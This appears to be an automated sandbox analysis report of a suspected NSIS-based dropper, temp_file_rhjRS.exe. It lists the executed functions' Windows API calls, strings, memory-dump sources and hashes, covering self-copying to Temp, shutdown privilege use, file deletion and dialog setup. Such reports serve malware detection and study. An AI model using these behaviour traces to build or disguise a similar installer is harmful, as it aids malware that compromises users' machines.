lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037AA
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
AdjustTokenPrivileges.ADVAPI32 ref: 00403845
ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
ExitProcess.KERNEL32 ref: 0040388D

Strings

C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe, xrefs: 004037A5
\Temp, xrefs: 004035AC
~nsu, xrefs: 004036F2
1033, xrefs: 004035F6
SeShutdownPrivilege, xrefs: 0040381C
TEMP, xrefs: 004035DA
C:\Users\user\AppData\Local\Temp, xrefs: 00403719, 0040371E, 0040374B
Error launching installer, xrefs: 0040367D
TMP, xrefs: 004035E2
C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber, xrefs: 004036A3
UXTHEME, xrefs: 004033A0, 004033A5, 004033AB
NSIS Error, xrefs: 00403412
.tmp, xrefs: 0040370E
"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 00403427, 0040342D, 00403623
C:\Users\user\AppData\Local\Temp\, xrefs: 0040358A, 0040358F, 004035A5, 004035B1, 004035C0, 004035CD, 004035D9, 004035E1, 004036F7, 00403708, 00403713, 0040371F, 0040372C, 0040373B, 004037EC
Low, xrefs: 004035C8
C:\Users\user\assureres\Indiciets237\Impersuadability, xrefs: 00403578, 00403698, 00403742, 0040374C

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe$C:\Users\user\assureres\Indiciets237\Impersuadability$C:\Users\user\assureres\Indiciets237\Impersuadability\Hudeopkber$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-1162895436
Opcode ID: e0a506ae4bc27558bcf72febbca0d615e00ee64c073f2cb074d7a3b9ba621889
Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
Opcode Fuzzy Hash: e0a506ae4bc27558bcf72febbca0d615e00ee64c073f2cb074d7a3b9ba621889
Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405996
lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 004059DE
lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A01
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
FindClose.KERNEL32(00000000), ref: 00405AC6

Strings

\*.*, xrefs: 004059D8
(?z, xrefs: 004059C6
"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 0040596D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3869584550
Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E

Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,00405C81,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,?,75923420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065AD
FindClose.KERNELBASE(00000000), ref: 004065B9

Strings

pOz, xrefs: 004065A3
C:\Users\user\AppData\Local\Temp\nsx8568.tmp, xrefs: 004065A2

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsx8568.tmp$pOz
API String ID: 2295610775-1194900389
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8

Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
ShowWindow.USER32(?), ref: 00403D74
DestroyWindow.USER32 ref: 00403D88
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
GetDlgItem.USER32(?,?), ref: 00403DC5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
IsWindowEnabled.USER32(00000000), ref: 00403DE0
GetDlgItem.USER32(?,00000001), ref: 00403E8E
GetDlgItem.USER32(?,00000002), ref: 00403E98
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
GetDlgItem.USER32(?,00000003), ref: 00403FA9
ShowWindow.USER32(00000000,?), ref: 00403FCA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
EnableWindow.USER32(?,?), ref: 00403FF7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
EnableMenuItem.USER32(00000000), ref: 00404014
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040402C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
ShowWindow.USER32(?,0000000A), ref: 004041B1

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E

Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000), ref: 004039EE
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\assureres\Indiciets237\Impersuadability,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\assureres\Indiciets237\Impersuadability,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\assureres\Indiciets237\Impersuadability), ref: 00403AD5

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

RegisterClassW.USER32(007A79C0), ref: 00403B12
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
ShowWindow.USER32(00000005,00000000), ref: 00403B95
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
RegisterClassW.USER32(007A79C0), ref: 00403BD7
DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6

Strings

RichEdit, xrefs: 00403BC8
.exe, xrefs: 00403A7B
RichEdit20W, xrefs: 00403BB9, 00403BBF
1033, xrefs: 0040398D, 004039E9
RichEd20, xrefs: 00403B9B
.DEFAULT\Control Panel\International, xrefs: 004039D9
Call, xrefs: 00403A35, 00403A3E, 00403A4C, 00403A9B, 00403AA1
Control Panel\Desktop\ResourceLocale, xrefs: 004039A1
"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 00403971
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979
_Nb, xrefs: 00403AF1, 00403B59
RichEd32, xrefs: 00403BA9
C:\Users\user\assureres\Indiciets237\Impersuadability, xrefs: 004039FD, 00403A05, 00403AA8, 00403AAE, 00403ABE

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\assureres\Indiciets237\Impersuadability$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3985614519
Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
soft, xrefs: 00402FAF
Inst, xrefs: 00402FA6
Null, xrefs: 00402FB8
"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" , xrefs: 00402EC1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
C:\Users\user\AppData\Local\Temp, xrefs: 00402F1C, 00402F21, 00402F27
vy, xrefs: 00402F4F
Error launching installer, xrefs: 00402F11

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" $C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-184076040
Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
CoTaskMemFree.OLE32(007924D8), ref: 0040642A
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406392
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040644A
Call, xrefs: 004062AB, 00406386, 0040638D, 00406391, 004063AB, 004063AC, 004063C1, 004063D4, 004063F0, 0040641B, 0040644F, 00406455, 00406471, 00406484, 004064A1, 004064A7, 004064B3, 004064E6

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
Opcode Fuzzy Hash: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D

Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
wsprintfW.USER32 ref: 0040661B
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F

Strings

\, xrefs: 004065F1
UXTHEME, xrefs: 004065D2
%s%S.dll, xrefs: 00406615

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
